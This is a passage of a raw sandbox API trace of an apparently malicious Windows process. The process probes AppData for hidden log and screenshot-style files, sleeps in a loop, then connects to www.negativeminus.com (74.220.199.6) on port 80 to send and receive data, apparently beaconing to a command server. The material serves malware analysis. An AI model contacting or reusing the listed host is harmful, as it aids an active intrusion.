DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.237] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.237] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.237] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.237] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.237] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.237] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.237] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.237] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.237] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.237] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.238] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.238] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.238] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.238] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.238] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.238] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.238] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0225.238] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.238] Sleep (dwMilliseconds=0x7d0) [0225.252] Sleep (dwMilliseconds=0x7d0) [0225.271] Sleep (dwMilliseconds=0x7d0) [0225.283] Sleep (dwMilliseconds=0x7d0) [0225.299] Sleep (dwMilliseconds=0x7d0) [0225.315] Sleep (dwMilliseconds=0x7d0) [0225.334] Sleep (dwMilliseconds=0x7d0) [0225.345] Sleep (dwMilliseconds=0x7d0) [0225.361] Sleep (dwMilliseconds=0x7d0) [0225.377] Sleep (dwMilliseconds=0x7d0) [0225.392] Sleep (dwMilliseconds=0x7d0) [0225.411] Sleep (dwMilliseconds=0x7d0) [0225.425] Sleep (dwMilliseconds=0x7d0) [0225.439] Sleep (dwMilliseconds=0x7d0) [0225.455] Sleep (dwMilliseconds=0x7d0) [0225.470] Sleep (dwMilliseconds=0x7d0) [0225.486] Sleep (dwMilliseconds=0x7d0) [0225.501] socket (af=2, type=1, protocol=6) returned 0x2e4 [0225.502] getaddrinfo (in: pNodeName="www.negativeminus.com", pServiceName="80", pHints=0x6f0c9d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0ca08 | out: ppResult=0x6f0ca08*=0x6eff7b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f368a0*(sa_family=2, sin_port=0x50, sin_addr="74.220.199.6"), ai_next=0x0)) returned 0 [0226.001] connect (s=0x2e4, name=0x3f368a0*(sa_family=2, sin_port=0x50, sin_addr="74.220.199.6"), namelen=16) returned 0 [0226.162] send (s=0x2e4, buf=0x25a505a*, len=173, flags=0) returned 173 [0226.162] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0226.162] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 4927 [0226.337] closesocket (s=0x2e4) returned 0 [0226.338] Sleep (dwMilliseconds=0x7d0) [0226.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.344] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.344] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0226.344] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.344] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.344] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.344] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.344] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.344] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.344] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.344] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.345] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.345] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.345] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.345] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.345] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.345] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.345] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.345] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.345] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.345] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.345] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.345] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.345] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.345] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.346] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.346] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.346] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.346] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.346] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.346] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.346] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.346] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0226.346] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.346] socket (af=2, type=1, protocol=6) returned 0x2e4 [0226.346] connect 